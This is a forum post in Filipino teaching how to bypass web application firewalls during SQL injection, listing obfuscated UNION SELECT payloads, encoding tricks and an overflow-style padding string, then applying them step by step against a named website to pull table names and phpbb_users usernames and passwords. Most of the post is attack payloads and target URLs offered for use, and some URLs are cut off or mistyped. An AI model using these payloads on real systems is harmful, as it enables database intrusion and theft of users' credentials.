- Messages
- 36
- Reaction score
- 2
- Points
- 28
**SQLi WAF ByPass** Ano ba ang WAF?
WAF (Web Application Firewall)
- para madetect at madepensahan ang site laban sa SQLi attack.. [direkta explanation ko na yan...]
Paano malalaman if may WAF ang isang site?
- madali lang malalaman, kapag naglagay ng command gamit ang SQL Injection, kadalasan itong "UNION SELECT" command.
may lalabas na error diyan tulad nitong: 403 Error [“Forbidden” or “Not Acceptable”].
-=[ WAF Bypassing Techniques ]=-
1] Comments - itong first method pang-bypass ng WAF. [Basic lang po ito]
Ganito siya :
/*!UNION*/ /*!SELECT*/
http://www.voltsx.cia.org/index.php?id=-13 /*!UNION*/ /*!SELECT*/ 1,2,3--
2] Pwede mo palitan ang case ng letra [small or capital]
Tulad nito :
uNIoN sELecT
http://www.www.voltsx.cia.org/index.php?id=-13 uNIoN sELecT 1,2,3--
3] Pwede mo rin ipagsama yung method [1] at [2].
- Itong method na to hindi basta-basta madedect ng Web Application Firewall [WAF]
Itong kinalabasan niya :
/*!uNIOn*/ /*!SelECt*/
http://www.www.voltsx.cia.org/index.php?id=-13 /*!uNIOn*/ /*!SelECt*/ 1,2,3--
4] Replaced Keywords - minsan ang ibang firewalls inaalis nila ang "UNION SELECT" statement na nasa url.
Ganito ang exploit function niya :
UNIunionON SELselectECT
http://www.www.voltsx.cia.org/index.php?id=-13 NIunionON SELselectECT 1,2,3--
5] Inline Comments - pwede mo rin mabypass ang firewall gamit ang inline comments.
Lagay mo lang sa gitna ng "UNION" at "SELECT" commands.
Parang ganito lang :
%55nION/**/%53ElecT
http://www.www.voltsx.cia.org/index.php?id=-13 %55nION/**/%53ElecT 1,2,3--
6] Buffer Overflow / Firewall Crash
- Karamihan kasi na firewall gawa sa C/C++ at mababypass yan using BOF [Buffer Overflow].
Tulad nito:
And(select 1)=(select 0x4141414141414141414141414141414141414141414141414141414141414141414141414?14141414141414141414141414141414141414141414141414141414141414141414141414141414?14141414141414141414141414141414141414141414141414141414141414141414141414141414?14141414141414141414141414141414141414141414141414141414141414141414141414141414?14141414141414141414141414141414141414141414141414141414141414141414141414141414?14141414141414141414141414141414141414141414141414141414141414141414141414141414?14141414141414141414141414141414141414141414141414141414141414141414141414141414?14141414141414141414141414141414141414141414141414141414141414141414141414141414?14141414141414141414141414141414141414141414141414141414141414141414141414141414?1414141)+
NOTE : A - hex value 41 (1000x)
or
and (/*!select*/ 1)=(/*!select*/ 0xAA)
http://www.www.voltsx.cia.org/index.php?id=-13 and (/*!select*/ 1)=(/*!select*/ 0xAA) 1,2,3--
or
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
http://www.www.voltsx.cia.org/index.php… 1,2,3--
7] Pwede mo rin palitan ang characters ng HEX value sa url.
Tulad nito:
/*!u%6eion*/ /*!se%6cect*/
http://www.www.voltsx.cia.org/index.php?id=-13 /*!u%6eion*/ /*!se%6cect*/ 1,2,3--
Punta na lang kayo dito para iconvert sa hex or sa add-on ng firerox [Hackbar]
http://www.swingnote.com/tools/texttohex.php
8] Baguhin mo rin yung mga common commands sa SQLi
- Maliban sa UNION SELECT commands na nabablolock ng firewall
- Ito pa yung iba :
Forbidden : @@version
Bypassed : version()
Forbidden : concat()
Bypassed : concat_ws()
Forbidden : group_concat()
Bypassed : concat_ws()
and so on ~ ~ ~
9] Ito pa yung ibang pwedeng gamitin pang-bypass :
union (select 1,2,3...)--
union (select 111,222,333...)--
uni*on sel*ect
(uNioN) (sElECt)
(uNioN SeleCT)
(UnI)(oN) (SeL)(ecT)
Para mas maintindihan niyo.. may ipapakita akong example kung paano siya inaapply...
Ok umpisahan natin...
Target Site : http://www.gmapinoytv.com.ph/
Vulnerable Link : http://www.gmapinoytv.com.ph/ver1/article.php?aid=64
Let's say nakuha na natin yung counts ng columns via ORDER BY command.
Ito na siya... pero may firewall siya..
http://www.gmapinoytv.com.ph/ver1/article.php…--
Ganito ang bypass method niya...
Add lang tayo ng open colon [(] sa start ng SELECT command...
At close [)] naman sa last ng column numbers...
Tulad nito :
UNION+(SELECT+1,2,3)--
ok ito ang actual:
http://www.gmapinoytv.com.ph/ver1/article.php…--
Di ba nabypass natin ang WAF...
Dun naman sa pagkuha ng version, database at current user name...
Alam niyo na yun hehehe... kaya di ko na papakita...
Dito naman tayo sa pagkuhang ng table names...
Ito ang normal syntax... pero error/forbidden siya dahil sa WAF ng site na nakainstall...
http://www.gmapinoytv.com.ph/ver1/a...chema.tables+WHERE+table_schema=database())--
Para naman mabypass siya...
Kailangan remove mo yung GROUP_CONCAT command.. yan kasi ang parating binablock ng firewall...
At note nagdadagan rin ako ng comments [/**/] sa may "FROM+information_schema./**/tables/**/"
Itong kumpleto syntax :
http://www.gmapinoytv.com.ph/ver1/a...*/tables/**/+WHERE+table_schema=database())--
Yea sa wakas na bypass na natin..
Ganun na rin sa pagkuha ng mga column names...
At sa usrname at password...
Ito syntax sa column names :
http://www.gmapinoytv.com.ph/ver1/article.php…--
Para naman sa hindi pa nakakaalam kung paano ko nakuha ito : 0x70687062625f7573657273
Yan po ang table name sa database ng site : phpbb_users
0x - prefix ng HEX
70687062625f7573657273 - HEX value ng phpbb_users
Ito naman ang pagkuha ng username at password :
http://www.gmapinoytv.com.ph/ver1/a..._password),4,5,6,7,8,9,10+FROM+phpbb_users)--
NOTE: Napakaimportante po nitong pag-aralan niyo...
Kasi karamihan na ng websites ngayon may mga firewall.
Credits: Cire Oiger
Happy sharing
~CoDeX
#AllHailPHU
